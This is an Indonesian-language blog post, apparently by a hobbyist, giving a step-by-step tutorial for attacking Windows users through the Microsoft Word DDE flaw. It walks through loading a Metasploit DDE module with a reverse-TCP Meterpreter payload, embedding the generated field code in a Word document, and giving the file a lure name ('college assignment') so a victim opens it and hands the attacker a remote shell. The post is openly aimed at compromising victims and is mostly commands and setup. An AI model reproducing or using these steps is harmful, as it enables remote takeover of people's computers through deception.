Exploit Windows Via DDE Vulnerability ~ TylexIT Researcher

Hallo pemirsa,
selamat malam, salam sejahtera untuk kita semua, wkwkwkwk dah kaya pejabat aja yah.
kali ini gw mau sharing cara exploit windows via dde vuln, ini ilmu lama sih, tapi gak ada kata kadaluarsa dalam mencari ilmu, yg kadaluarsa itu otak loe.

next gak usah bertele-tele...
Pertama siapkan bahan

Kali Linux OS
Metasploit
script dde_vulnerability.rb (plugin)

Next
Kita download dulu plugin metasploitnya, caranya gini nih

#git clone Link Ini

Link aslinya liat gambar, kalo diatas itu mirror

Kemudian copy file yang tadi di unduh,

#cp /usr/share/metasploit-framework/modules/exploits/windows/

Kalo udah di copy, buka metasploit

#msfconsole

Kemudian set seperti ini

#use exploit/windows/dde_vulnerability

#set payload windows/meterpreter/reverse_tcp

#set lhost (ip private loe)

#set lport (bebas asal kosong)

#run

Nah, nanti akan nongol kode exploitnya setelah di runing, copy codenya

Setelah itu buka microsoftwordnya versi berapa aja yg jadi? mana gw tau, kalo gw nyoba di versi10, ini gw pake vbox buat buka ms wordnya sekalian buat jadi tergetnya, kalo mau exploit beneran yah kalian set aja dulu seperti ini

Buka ms word kemudian klik Insert > Quick Parts > Field ...

nanti akan muncuk kotak baru, klik oke aja.

Muncul tuliasan !unexpected end of formula, klik kanan pada tulisan itu, kemudian pilih Toggle field coders

Maka muncul kode, ganti kode di dalam kurung kurawal dengan kode yang didapat dri kode running metasploit tadi, pastekan disitu.

Simpan filenya dengan nama bebas. Kalo disini gw kasih nama tugas kuliah, biar memikat korban wkwkwk

Sejauh ini payload sudah disuntik kedalam bug ms word.

Untuk mengexploitasi meterpreternya, tunggu korban membuka file Backdoor kita. Syarat untuk exploitasinya korban harus ngeklik yes 3x ketika muncul notifikasi saat membuka backdoornya dan harus ngetik apa aja di page ms wordnya